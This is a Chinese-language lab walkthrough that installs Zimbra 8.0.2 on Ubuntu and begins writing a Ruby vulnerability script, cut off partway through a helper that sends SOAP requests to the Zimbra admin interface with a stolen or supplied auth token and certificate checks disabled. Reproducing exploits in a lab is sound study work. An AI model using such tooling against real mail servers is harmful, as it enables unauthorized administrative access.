一、环境安装
首先完成在ubuntu 12.04LTS环境下zimbra 8.0.2的安装及配置。
本机DNS解析:
启动安装完毕之后的zimbra:
进入管理员界面https://mail.server2.com:7071创建两个普通帐户收发邮件测试zimbra可以正常运行:
二、创建漏洞脚本
漏洞脚本使用ruby编译,并且在windows环境下运行,共有两个rb文件。
ultils.rb:
require 'net/https'
class Utils
def request_soap_admin(*api_call*)
@request=api_call
soap_client = *Net*::*HTTP*.new( $host, 7071 )
soap_client.use_ssl = true
soap_client.verify_mode = *OpenSSL*::*SSL*::VERIFY_NONE
soap_path = "/service/admin/soap"
soap_data = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{$auth_key}</authToken></context></soap:Header><soap:Body>#{@request}</soap:Body></soap:Envelope>"
response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" } )
if response.body.match(/Error/)
error_res = response.body.match(/<soap:Text>(.*?)<\/soap:Text>/ui)[1]
puts &